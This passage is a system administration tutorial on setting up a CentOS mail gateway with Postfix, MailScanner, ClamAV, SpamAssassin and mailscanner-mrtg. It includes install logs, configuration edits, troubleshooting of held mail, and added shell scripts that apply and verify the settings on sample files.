(3/11): perl-Net-DNS-0.61 100% |=========================| 271 kB    00:35
(4/11): perl-Net-SSLeay-1 100% |=========================| 198 kB    00:06
(5/11): perl-Digest-SHA1- 100% |=========================|  19 kB    00:04
(6/11): perl-Net-IP-1.25- 100% |=========================|  30 kB    00:06
(7/11): perl-Time-HiRes-1 100% |=========================|  22 kB    00:04
(8/11): perl-IO-Socket-SS 100% |=========================|  43 kB    00:06
(9/11): perl-Archive-Tar- 100% |=========================|  47 kB    00:07
(10/11): spamassassin-3.2 100% |=========================| 1.0 MB    02:19
(11/11): perl-IO-Zlib-1.0 100% |=========================|  15 kB    00:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
  Installing: perl-Digest-SHA1             ####################### [ 1/12]
  Updating  : perl-HTML-Parser             ####################### [ 2/12]
  Installing: perl-Digest-HMAC             ####################### [ 3/12]
  Installing: perl-IO-Zlib                 ####################### [ 4/12]
  Installing: perl-Archive-Tar             ####################### [ 5/12]
  Installing: perl-Time-HiRes              ####################### [ 6/12]
  Installing: perl-Net-IP                  ####################### [ 7/12]
  Installing: perl-Net-DNS                 ####################### [ 8/12]
  Installing: perl-Net-SSLeay              ####################### [ 9/12]
  Installing: perl-IO-Socket-SSL           ####################### [10/12]
  Installing: spamassassin                 ####################### [11/12]
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "en_US.en"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "en_US.en"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
  Cleanup   : perl-HTML-Parser             ####################### [12/12]

Installed: spamassassin.i386 0:3.2.3-1.el4.rf
Dependency Installed: perl-Archive-Tar.noarch 0:1.32-1.el4.rf perl-Digest-HMAC.noarch 0:1.01-13 perl-Digest-SHA1.i386 0:2.07-5 perl-IO-Socket-SSL.noarch 0:1.07-2.el4.rf perl-IO-Zlib.noarch 0:1.05-1.el4.rf perl-Net-DNS.i386 0:0.61-1.el4.rf perl-Net-IP.noarch 0:1.25-1.el4.rf perl-Net-SSLeay.i386 0:1.30-4.el4.centos perl-Time-HiRes.i386 0:1.55-3
Dependency Updated: perl-HTML-Parser.i386 0:3.55-1.el4.rf
Complete!
[root@mail ~]#

5. Because of the locale warning above, we should correct /etc/sysconfig/i18n; if we do not, the same prompt appears every time MailScanner restarts during installation, although I am not aware of any other impact.
[root@mail ~]# vi /etc/sysconfig/i18n
Add the line:
LC_ALL="C"
and change LANG="en_US.UTF-8"
to LANG="en_US"

6. Next, install MailScanner. First download it from the official site, http://www.mailscanner.info/.
[root@mail tmp]# wget http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz

--16:40:51--  http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz
           => `MailScanner-4.62.9-3.rpm.tar.gz'
Resolving www.mailscanner.info... 81.17.252.15
Connecting to www.mailscanner.info|81.17.252.15|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,239,584 (4.0M) [application/x-gzip]
100%[====================================>] 4,239,584    6.74K/s    ETA 00:00
16:50:54 (6.88 KB/s) - `MailScanner-4.62.9-3.rpm.tar.gz' saved [4239584/4239584]
[root@mail tmp]# tar zxvf MailScanner-4.62.9-3.rpm.tar.gz    # extract the package
[root@mail tmp]# cd MailScanner-4.62.9-3
[root@mail MailScanner-4.62.9-3]# ./install.sh    # this takes a while; time for a cup of tea, ha ha!
Good. You have the patch command.
Good, you have /usr/src/redhat in place.
Writing a .rpmmacros file in your home directory to stop
unpackaged files breaking the build process.
You can delete it once MailScanner is installed if you want to.
Now to install MailScanner itself.
NOTE: If you get lots of errors here, run the install.sh script
NOTE: again with the command "./install.sh nodeps"
Preparing...                ########################################### [100%]
   1:mailscanner            ########################################### [100%]
Good, SpamAssassin site rules found in /etc/mail/spamassassin
To activate MailScanner run the following commands:
service sendmail stop
chkconfig sendmail off
chkconfig --level 2345 MailScanner on
service MailScanner start
For technical support, please read the MAQ at www.mailscanner.biz/maq/
and buy the book at www.mailscanner.info/store
----------------------------------------------------------
Please buy the MailScanner book from http://www.mailscanner.info/!
It is a very useful administration guide and introduction
to MailScanner. All the proceeds go directly to making
MailScanner a better supported package than it is today.


7. Configure MailScanner to work with Postfix and to call ClamAV and SpamAssassin (each setting is shown as the original line followed by the modified line):
[root@mail MailScanner-4.62.9-3]# vi /etc/MailScanner/MailScanner.conf
%org-name% = yoursite
%org-name% = centosmail

%org-long-name% = Your Organisation Name Here
%org-long-name% = CentosMail_Leeki.Yan

%web-site% = http://www.your-organisation.com/
%web-site% = http://www.centos.eb.cn/

Run As User =
Run As User = postfix

Run As Group =
Run As Group = postfix

Incoming Queue Dir = /var/spool/mqueue.in
Incoming Queue Dir = /var/spool/postfix/hold

Outgoing Queue Dir = /var/spool/mqueue
Outgoing Queue Dir = /var/spool/postfix/incoming

MTA = sendmail
MTA = postfix

Virus Scanners = auto
Virus Scanners = clamav

Always Include SpamAssassin Report = no
Always Include SpamAssassin Report = yes

SpamAssassin User State Dir =
SpamAssassin User State Dir = /var/spool/MailScanner/spamassassin

Incoming Work User =
Incoming Work Group =
Incoming Work User = postfix
Incoming Work Group = postfix

SpamAssassin Install Prefix =
SpamAssassin Install Prefix = /usr/bin

Quarantine User =
Quarantine Group =
Quarantine User = postfix
Quarantine Group = postfix

[root@mail MailScanner-4.62.9-3]# vi /etc/MailScanner/MailScanner.conf
[root@mail MailScanner-4.62.9-3]# cd /var/spool/MailScanner/
[root@mail MailScanner]# ls -al
total 20
drwxr-xr-x   4 root root 4096 Aug 31 20:34 .
drwxr-xr-x  16 root root 4096 Aug 31 20:34 ..
drwxr-xr-x   8 root root 4096 Aug 31 21:01 incoming
drwxr-xr-x   2 root root 4096 Aug 31 20:34 quarantine
[root@mail MailScanner]# mkdir spamassassin
[root@mail MailScanner]# mkdir .spamassassin
[root@mail MailScanner]# chown -R postfix:postfix /var/spool/MailScanner/*
[root@mail MailScanner]# ls -al
total 28
drwxr-xr-x   6 root    root    4096 Aug 31 21:48 .
drwxr-xr-x  16 root    root    4096 Aug 31 20:34 ..
drwxr-xr-x   2 root    root    4096 Aug 31 21:48 .spamassassin
drwxr-xr-x   8 postfix postfix 4096 Aug 31 21:01 incoming
drwxr-xr-x   2 postfix postfix 4096 Aug 31 20:34 quarantine
drwxr-xr-x   2 postfix postfix 4096 Aug 31 21:48 spamassassin

Modify main.cf so that Postfix hands incoming mail to MailScanner:
[root@mail MailScanner]# vi /etc/postfix/main.cf
Change: #header_checks = regexp:/etc/postfix/header_checks
to: header_checks = regexp:/etc/postfix/header_checks
[root@mail MailScanner]# mv /etc/postfix/header_checks /etc/postfix/header_checks.bak
[root@mail MailScanner]# vi /etc/postfix/header_checks
Add the following line (separate the pattern from the action with the Tab key, not spaces):
/^Received:/	HOLD
[root@mail MailScanner]# chkconfig spamassassin on
[root@mail MailScanner]# service spamassassin start
Starting spamd: [OK]
[root@mail MailScanner]#
[root@mail MailScanner]# chkconfig postfix off    # disable Postfix's own startup script; the MailScanner init script starts Postfix itself
[root@mail MailScanner]# chkconfig MailScanner on
[root@mail MailScanner]# /etc/rc.d/init.d/MailScanner start
Starting MailScanner daemons:
incoming postfix: [OK]
outgoing postfix: [OK]
MailScanner: [OK]

Check whether clamd has started with the following command:
[root@mail MailScanner]# ps -aux | grep clamd
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.3/FAQ
root 12603 0.0 0.2 2992 444 pts/0 S+ 22:08 0:00 grep clamd
(The only process listed is the grep itself, so no clamd daemon was running at this point.)
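The edits in step 7 are easy to get wrong by hand on a rebuilt gateway, so here is an added example (not from the article or the MailScanner project) that applies the same MailScanner.conf settings with a POSIX shell script and verifies them afterwards. It edits a constructed excerpt of the configuration file written to a temporary location, never the live /etc/MailScanner/MailScanner.conf; the keys, values and the header_checks entry are the ones from this article.

```sh
#!/bin/sh
# Added example (not from the article): apply the step 7 MailScanner.conf
# changes with a script and verify them. It edits a constructed sample of
# the configuration written to a temporary file, never the live
# /etc/MailScanner/MailScanner.conf.

# Print the value of a "Key = value" line; empty output if the key is unset.
get_conf_value() {
    awk -v key="$2" '
        BEGIN { n = length(key) }
        substr($0, 1, n) == key && substr($0, n + 1) ~ /^[ \t]*=/ {
            sub(/^[^=]*=[ \t]*/, ""); print; exit
        }' "$1"
}

# Replace the value of an existing "Key = value" line in place.
set_conf_value() {
    awk -v key="$2" -v val="$3" '
        BEGIN { n = length(key) }
        substr($0, 1, n) == key && substr($0, n + 1) ~ /^[ \t]*=/ {
            print key " = " val; next
        }
        { print }' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# The settings from step 7, one "key|value" pair per line.
POSTFIX_SETTINGS='%org-name%|centosmail
%org-long-name%|CentosMail_Leeki.Yan
%web-site%|http://www.centos.eb.cn/
Run As User|postfix
Run As Group|postfix
Incoming Queue Dir|/var/spool/postfix/hold
Outgoing Queue Dir|/var/spool/postfix/incoming
MTA|postfix
Virus Scanners|clamav
Always Include SpamAssassin Report|yes
SpamAssassin User State Dir|/var/spool/MailScanner/spamassassin
Incoming Work User|postfix
Incoming Work Group|postfix
SpamAssassin Install Prefix|/usr/bin
Quarantine User|postfix
Quarantine Group|postfix'

apply_postfix_settings() {
    while IFS='|' read -r key val; do
        set_conf_value "$1" "$key" "$val"
    done <<EOF
$POSTFIX_SETTINGS
EOF
}

# Return 0 when every setting has its expected value; list mismatches otherwise.
verify_postfix_settings() {
    bad=0
    while IFS='|' read -r key val; do
        actual=$(get_conf_value "$1" "$key")
        if [ "$actual" != "$val" ]; then
            echo "MISMATCH: $key = '$actual' (expected '$val')" >&2
            bad=$((bad + 1))
        fi
    done <<EOF
$POSTFIX_SETTINGS
EOF
    [ "$bad" -eq 0 ]
}

# The Postfix header_checks entry from step 7: pattern, a Tab, then HOLD.
write_header_checks() {
    printf '/^Received:/\tHOLD\n' > "$1"
}

# Constructed excerpt of a stock MailScanner.conf with its sendmail defaults.
make_sample_conf() {
    cat > "$1" <<'EOF'
%org-name% = yoursite
%org-long-name% = Your Organisation Name Here
%web-site% = http://www.your-organisation.com/
Run As User =
Run As Group =
Incoming Queue Dir = /var/spool/mqueue.in
Outgoing Queue Dir = /var/spool/mqueue
MTA = sendmail
Virus Scanners = auto
Always Include SpamAssassin Report = no
SpamAssassin User State Dir =
Incoming Work User =
Incoming Work Group =
SpamAssassin Install Prefix =
Quarantine User =
Quarantine Group =
Sign Clean Messages = yes
EOF
}

CONF=$(mktemp) && HC=$(mktemp)
make_sample_conf "$CONF"
apply_postfix_settings "$CONF"
write_header_checks "$HC"
verify_postfix_settings "$CONF" && echo "all step 7 settings applied to $CONF"
```

Keys are matched on the whole name followed by "=", so "Quarantine User" does not touch "Quarantine User State" style keys, and settings the script does not list (Sign Clean Messages in the sample) are left as they were. To use it on a real gateway, point make_sample_conf's caller at a copy of MailScanner.conf and diff the copy against the original before installing it.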

8. Reboot the machine and start testing.
[root@mail ~]# tail -f /var/log/maillog
Send a test message; the following then appears in the log:
Aug 31 22:23:18 mail MailScanner[2600]: Using locktype = flock
Aug 31 22:23:18 mail MailScanner[3338]: Using SpamAssassin results cache
Aug 31 22:23:18 mail MailScanner[3338]: Connected to SpamAssassin cache database
Aug 31 22:23:18 mail MailScanner[3338]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 31 22:23:33 mail MailScanner[2709]: Using locktype = flock
Aug 31 22:23:36 mail MailScanner[3264]: Using locktype = flock
Aug 31 22:23:38 mail MailScanner[3336]: Using locktype = flock
Aug 31 22:23:39 mail MailScanner[3338]: Using locktype = flock
Aug 31 22:24:13 mail pop3-login: Login: leeki.yan [::ffff:10.0.0.25]
Aug 31 22:25:39 mail postfix/smtpd[3345]: connect from unknown[10.0.0.25]
Aug 31 22:25:39 mail postfix/smtpd[3345]: C38C71702CA: client=unknown[10.0.0.25]
Aug 31 22:25:40 mail postfix/cleanup[3348]: C38C71702CA: hold: header Received: from ts (unknown [10.0.0.25])??by mail.centos.eb.cn (Postfix) with SMTP id C38C71702CA??for ; Fri, 31 Aug 2007 22:25:39 +0800 (CST) from unknown[10.0.0.25]; from= to= proto=SMTP helo=
Aug 31 22:25:40 mail postfix/cleanup[3348]: C38C71702CA: message-id=<001901c7ebdb$f70f9ff0$1900000a@triumph>
Aug 31 22:25:40 mail postfix/smtpd[3345]: disconnect from unknown[10.0.0.25]
Aug 31 22:25:43 mail MailScanner[3264]: New Batch: Scanning 1 messages, 934 bytes
Aug 31 22:25:59 mail pop3-login: Login: leeki.yan [::ffff:10.0.0.25]
Aug 31 22:25:59 mail MailScanner[3264]: Virus and Content Scanning: Starting
Aug 31 22:26:14 mail MailScanner[3264]: Requeue: C38C71702CA.8937F to 14A741702E8
Aug 31 22:26:14 mail MailScanner[3264]: Uninfected: Delivered 1 messages
Aug 31 22:26:14 mail postfix/qmgr[2579]: 14A741702E8: from= , size=1212, nrcpt=1 (queue active)
Aug 31 22:26:14 mail postfix/local[3361]: 14A741702E8: to= , relay=local, delay=35, status=sent (delivered to maildir)
Aug 31 22:26:14 mail postfix/qmgr[2579]: 14A741702E8: removed
Aug 31 22:28:29 mail pop3-login: Login: leeki.yan [::ffff:10.0.0.25]
The log above shows the expected flow: cleanup puts the message on hold, MailScanner scans it and requeues it under a new queue ID, and Postfix then delivers it. MailScanner is doing its job.

9. Other parameters in MailScanner.conf:
a. By default MailScanner appends the following text to every message:
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean
To turn this off, edit /etc/MailScanner/MailScanner.conf and change
Sign Clean Messages = yes
to
Sign Clean Messages = no
b. A Chinese translation of the report templates can be found on the Internet; with it installed, warning messages are sent in Chinese.
Move the cn directory into /etc/MailScanner/reports, alongside the existing English templates in /etc/MailScanner/reports/en.
Because the Chinese set does not contain every report file, the log shows errors. Fix:
cd /etc/MailScanner/reports/cn
cp ../en/* ../cn
When asked whether to overwrite existing files, answer n.
c. Exempting addresses from spam scanning:
Edit /etc/MailScanner/MailScanner.conf and set
Is Definitely Not Spam = /etc/MailScanner/rules/spam.whitelist.rules
vi /etc/MailScanner/rules/spam.whitelist.rules
Add: From: *@centos.eb.cn yes    # centos.eb.cn is the local domain
Restart MailScanner.
Q: I added whitelist_from *@trinet.com.cn to /etc/mail/spamassassin/local.cf. Mail sent this way is not marked as spam, but it is still checked. What is the difference between these two settings?
A: With whitelist_from the spam checks are still run; whitelist_from only contributes a score of -100.
With spam.whitelist.rules the message is not marked as spam at all, and the spam checks are no longer performed.
d. Max Children = 5    # number of MailScanner worker processes. If your machine is not powerful, set a small value, because MailScanner consumes a lot of resources, especially memory.
e. Virus Scanner Timeout = 30    # the longest time the virus scanner may spend scanning your mail
f. Find Phishing Fraud = yes    # whether to enable phishing detection for e-mail
g. Filename Rules = %etc-dir%/filename.rules.conf
Filetype Rules = %etc-dir%/filetype.rules.conf    # these two parameters define which attachment names and types your mail system may receive or send
h. Max SpamAssassin Size = 1024k    # the maximum message size that SpamAssassin scans
i. Syslog Facility = mail
Log Speed = no
Log Spam = no
Log Non Spam = no
Log Permitted Filenames = no
Log Permitted Filetypes = no
Log Silent Viruses = no
Log Dangerous HTML Tags = no    # the parameters above control what MailScanner records in maillog. If your machine is not powerful, I suggest setting them to no.




10. Install mailscanner-mrtg to monitor mail traffic:
[root@mail tmp]# wget http://nchc.dl.sourceforge.net/sourceforge/mailscannermrtg/mailscanner-mrtg-0.10.00-1.noarch.rpm
[root@mail tmp]# rpm -ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
error: Failed dependencies:
mrtg >= 2.9 is needed by mailscanner-mrtg-0.10.00-1.noarch
Suggested resolutions:
/home/buildcentos/CENTOS/en/4.0/i386/CentOS/RPMS/mrtg-2.10.15-1.i386.rpm
The error above is caused by a missing dependency: install mrtg first, then install mailscanner-mrtg.
[root@mail tmp]# yum -y install mrtg
Dependencies Resolved
=============================================================================
Package Arch Version Repository Size
=============================================================================
Installing:
mrtg i386 2.10.15-1 base 914 k
Installing for dependencies:
gd i386 2.0.28-5.4E base 119 k
Transaction Summary
=============================================================================
Install 2 Package(s)
Update 0 Package(s)
Remove 0 Package(s)
Total download size: 1.0 M
Downloading Packages:
(1/2): gd-2.0.28-5.4E.i38 100% |=========================| 119 kB 02:48
(2/2): mrtg-2.10.15-1.i38 100% |=========================| 914 kB 13:02
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: gd ######################### [1/2]
Installing: mrtg ######################### [2/2]
Installed: mrtg.i386 0:2.10.15-1
Dependency Installed: gd.i386 0:2.0.28-5.4E
Complete!
Re-run the mailscanner-mrtg install; it now succeeds:
[root@mail tmp]# rpm -ivh mailscanner-mrtg-0.10.00-1.noarch.rpm
warning: mailscanner-mrtg-0.10.00-1.noarch.rpm: V3 DSA signature: NOKEY, key ID e342f442
Preparing ... ########################################### [100%]
1: mailscanner-mrtg ########################################### [100%]
Running MRTG to get your initial graphs (Could be slow)
Stopping httpd: [FAILED]
Starting httpd: httpd: Could not determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[OK]
(The NOKEY warning means rpm could not verify the package signature because the signing key is not imported; rpm installs the package anyway.)

Note: after mailscanner-mrtg was installed, maillog kept reporting the following errors:
Oct 25 15:20:02 mailgate MailScanner-MRTG[5072]: ERROR: Snmpwalk Binary specified in /etc/MailScanner/mailscanner-mrtg.conf is not executable or not present. Maybe you need to install the snmp or snmp-utils packages. See the README.SNMP file in the docs. - Skipping snmp functions
Oct 25 15:20:02 mailgate MailScanner-MRTG[5072]: Unable to find a mountpoint for /var/spool. Please set Spool Directory in mailscanner-mrtg.conf to a valid mountpoint. You can see a list of mointpoints on your system by using the df command.
Oct 25 15:20:02 mailgate MailScanner-MRTG[5072]: Unable to find a mountpoint for /var/spool/MailScanner/incoming. Please set MailScanner Work Directory in mailscanner-mrtg.conf to a valid mountpoint. You can see a list of mointpoints on your system by using the df command

Fixing the errors above (because the snmp package is not installed, the CPU and MEM graphs come out empty):
vi /etc/MailScanner/mailscanner-mrtg.conf
Change:
Use SNMP = yes
Snmpwalk Binary = /usr/bin/snmpwalk
MailScanner Work Directory = /var/spool/MailScanner/incoming
Spool Directory = /var/spool
to:
# Use SNMP = yes
# Snmpwalk Binary = /usr/bin/snmpwalk
MailScanner Work Directory = /
Spool Directory = /
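As an added example (not from the article or the MailScanner-MRTG project), the shell functions below reproduce the check behind the "Unable to find a mountpoint" messages: MailScanner-MRTG wants Spool Directory and MailScanner Work Directory to name mount points, so for each configured directory the script finds the longest mount point that contains it. A constructed df -P listing stands in for the real command so the script runs anywhere; on a gateway with a single root filesystem it resolves /var/spool and /var/spool/MailScanner/incoming to /, which is the value the fix above uses, and the listing also includes a hypothetical separate /var/spool/postfix filesystem to show the general case.

```sh
#!/bin/sh
# Added example (not from the article or MailScanner-MRTG): resolve the mount
# point that "Spool Directory" and "MailScanner Work Directory" must name.
# A constructed `df -P` listing stands in for the real command; mount points
# containing spaces are not handled, since $NF is taken as the mount point.

SAMPLE_DF='Filesystem     1024-blocks    Used Available Capacity Mounted on
/dev/sda1          8123456 3456789   4243345      45% /
/dev/sda2         20000000 1000000  19000000       5% /var/spool/postfix
tmpfs               512000       0    512000       0% /dev/shm'

# Print the longest mount point in the df listing ($2) that contains path ($1).
mountpoint_for() {
    printf '%s\n' "$2" | awk -v p="$1" '
        BEGIN { best = "" }
        NR > 1 {
            m = $NF
            if (m == "/" || p == m || index(p, m "/") == 1)
                if (length(m) > length(best)) best = m
        }
        END { print best }'
}

# Return 0 if $1 is itself a mount point in the listing ($2).
is_mountpoint() {
    [ "$(mountpoint_for "$1" "$2")" = "$1" ]
}

# For each directory given, say whether mailscanner-mrtg.conf can use it as is
# or which mount point to put there instead (the disk graphs then show that
# filesystem's usage rather than the directory's).
check_mrtg_dirs() {
    listing=$1; shift
    for d in "$@"; do
        mp=$(mountpoint_for "$d" "$listing")
        if [ "$mp" = "$d" ]; then
            echo "$d: is a mount point, keep it"
        else
            echo "$d: not a mount point, set the option to $mp"
        fi
    done
}

check_mrtg_dirs "$SAMPLE_DF" /var/spool /var/spool/MailScanner/incoming /var/spool/postfix/hold
```

On a real system replace SAMPLE_DF with "$(df -P)". Setting both options to / is correct only when the spool really lives on the root filesystem; if /var/spool is later moved to its own filesystem, the options should follow it, otherwise the disk graphs quietly report the wrong filesystem.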


11. Apache configuration and the mailscanner-mrtg parameters, with automatic start (Apache was already installed in the previous article)
[root@mail tmp]# chkconfig httpd on
[root@mail tmp]# vi /etc/MailScanner/mailscanner-mrtg.conf
MTA = sendmail
MTA = postfix

Incoming Queue Dir = /var/spool/mqueue.in/    # Sendmail
Incoming Queue Dir = /var/spool/postfix/hold/    # Postfix

Outgoing Queue Dir = /var/spool/mqueue/    # Sendmail
Outgoing Queue Dir = /var/spool/postfix/incoming/    # Postfix

Interfaces to Monitor = eth0    (adjust this to your system; run ifconfig -a first to check the interface name)
On this machine, for example, no change is needed, as the following shows:
[root@mail tmp]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:C0:A8:F5:06:CD
          inet addr:10.6.6.111  Bcast:10.255.255.255  Mask:255.0.0.0
          inet6 addr: fe80::2c0:a8ff:fef5:6cd/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5950 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3547 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1585146 (1.5 MiB)  TX bytes:463239 (452.3 KiB)
Restart the Apache service, then open http://<IP address of the mail server>/mailscanner-mrtg/ in a browser to see the traffic graphs.


12. Other settings:
a. Automatic virus database updates:
[root@mail tmp]# vi /etc/freshclam.conf
Add: LogFileMaxSize 2M
Change: #PidFile /var/run/freshclam.pid
to: PidFile /var/run/freshclam.pid
[root@mail tmp]# crontab -e
0 */12 * * * /usr/bin/freshclam --quiet -l /var/log/clamav/freshclam.log
(This entry updates the database every 12 hours.)

b. Set up SpamAssassin with the Chinese CCERT anti-spam rule set and update it automatically:
[root@mail tmp]# wget -N -P /usr/share/spamassassin www.ccert.edu.cn/spam/sa/Chinese_rules.cf
[root@mail tmp]# crontab -e
Copy the following line into the crontab to update the rules automatically (it runs at 00:00 on the first day of every month):
0 0 1 * * wget -N -P /usr/share/spamassassin www.ccert.edu.cn/spam/sa/Chinese_rules.cf; /etc/rc.d/init.d/spamassassin restart
Note that this fetches the rule file over plain HTTP with no integrity check and loads it into SpamAssassin unattended, so the gateway trusts whatever that download source serves.
# sa-learn --sync -D -p user_prefs    (Bayes learning)
# sa-learn --dump all    (view the learned data)


13. With this, the anti-virus and anti-spam functions are in place. One thing deserves particular attention:
the MailScanner.conf parameter
Original value: SpamAssassin Local Rules Dir =
Many online references set this parameter to:
SpamAssassin Local Rules Dir = /etc/MailScanner
I recommend not setting this parameter. When I set up the gateway according to that guidance and put it into service, all mail got stuck in the queue; the log kept repeating the following lines but reported no error message, which was frustrating!
Aug 25 22:58:27 mail MailScanner[5619]: Using SpamAssassin results cache
Aug 25 22:58:27 mail MailScanner[5619]: Connected to SpamAssassin cache database
Aug 25 22:58:27 mail MailScanner[5619]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:30 mail MailScanner[5620]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:30 mail MailScanner[5620]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:30 mail MailScanner[5620]: SpamAssassin temporary working directory is /var/spool/MailScanner/incoming/SpamAssassin-Temp
Aug 25 22:58:32 mail MailScanner[5620]: Using SpamAssassin results cache
Aug 25 22:58:32 mail MailScanner[5620]: Connected to SpamAssassin cache database
Aug 25 22:58:32 mail MailScanner[5620]: Enabling SpamAssassin auto-whitelist functionality ...
Aug 25 22:58:35 mail MailScanner[5626]: MailScanner E-Mail Virus Scanner version 4.62.9 starting ...
Aug 25 22:58:35 mail MailScanner[5626]: Read 794 hostnames from the phishing whitelist
Aug 25 22:58:36 mail MailScanner[5626]: SpamAssassin temporary working directory is /var/spool/MailScanner/incoming/SpamAssassin-Temp

Checking the queue: whether sending or receiving, all mail is stuck in the queue. The test messages sent and received are all held:
[root@mail incoming]# mailq
-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
695912341DA!     5535 Sat Aug 25 22:55:59  root@centos.eb.cn
                                           root@centos.eb.cn

07D6B2341D8!    11042 Sat Aug 25 22:34:34  leeki.yan@centos.eb.cn
                                           leeki.yan@centos.eb.cn

BEEBD2341D9!     2085 Sat Aug 25 23:00:58  leeki.yan@centos.eb.cn
                                           leeki.yan@centos.eb.cn

-- 18 Kbytes in 3 Requests.
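To spot this failure mode from monitoring rather than by reading maillog, here is an added shell check (not from the article): it counts mailq entries by state, using Postfix's markers after the queue ID ("!" for a message on hold, "*" for an active one, no marker for a deferred one), and flags a snapshot in which every queued message is on hold and nothing is active. The two mailq listings are constructed for the example, the first mirroring the stuck state shown above; on a real gateway pipe the output of mailq into the functions instead. A single snapshot can be momentary, since MailScanner normally takes messages off hold quickly, so alert only when the condition persists across several checks.

```sh
#!/bin/sh
# Added example (not from the article): detect the "all mail on hold" symptom
# from mailq output. Postfix marks a held message with "!" and an active one
# with "*" after the queue ID; a deferred message has no marker.

# Constructed mailq listing matching the stuck state in step 13.
SAMPLE_STUCK='-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
695912341DA!     5535 Sat Aug 25 22:55:59  root@centos.eb.cn
                                         root@centos.eb.cn

07D6B2341D8!    11042 Sat Aug 25 22:34:34  leeki.yan@centos.eb.cn
                                         leeki.yan@centos.eb.cn

BEEBD2341D9!     2085 Sat Aug 25 23:00:58  leeki.yan@centos.eb.cn
                                         leeki.yan@centos.eb.cn

-- 18 Kbytes in 3 Requests.'

# Constructed listing of a healthy queue: one message on hold (being scanned),
# one active, one deferred with its reason line.
SAMPLE_MIXED='-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
1A2B3C4D5E6!     2201 Sat Aug 25 23:05:01  leeki.yan@centos.eb.cn
                                         root@centos.eb.cn

2B3C4D5E6F7*     9102 Sat Aug 25 23:05:03  root@centos.eb.cn
                                         leeki.yan@centos.eb.cn

3C4D5E6F7A8      4410 Sat Aug 25 22:40:12  leeki.yan@centos.eb.cn
(connect to mx.example.invalid[192.0.2.10]:25: Connection timed out)
                                         someone@example.invalid

-- 15 Kbytes in 3 Requests.'

# Read a mailq listing on stdin and print "held active deferred total".
queue_counts() {
    awk '
        $1 ~ /^[0-9A-F][0-9A-F]*[!*]?$/ {
            total++
            if ($1 ~ /!$/) held++
            else if ($1 ~ /\*$/) active++
            else deferred++
        }
        END { printf "%d %d %d %d\n", held, active, deferred, total }'
}

# Return 0 (alert) when the queue is non-empty, every message is on hold and
# none is active: the snapshot that step 13 shows. Repeat over several checks
# before acting on it, since messages sit on hold briefly while MailScanner
# scans them.
hold_queue_stuck() {
    set -- $(queue_counts)
    [ "$4" -gt 0 ] && [ "$1" -eq "$4" ]
}

printf '%s\n' "$SAMPLE_STUCK" | queue_counts    # 3 0 0 3
if printf '%s\n' "$SAMPLE_STUCK" | hold_queue_stuck; then
    echo "ALERT: all queued mail is on hold; check that MailScanner is processing the hold queue"
fi
```

For a cron-driven check, replace the printf with mailq and have the alert branch send a notification; the counts line is also handy as a value to graph next to the mailscanner-mrtg traffic graphs.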
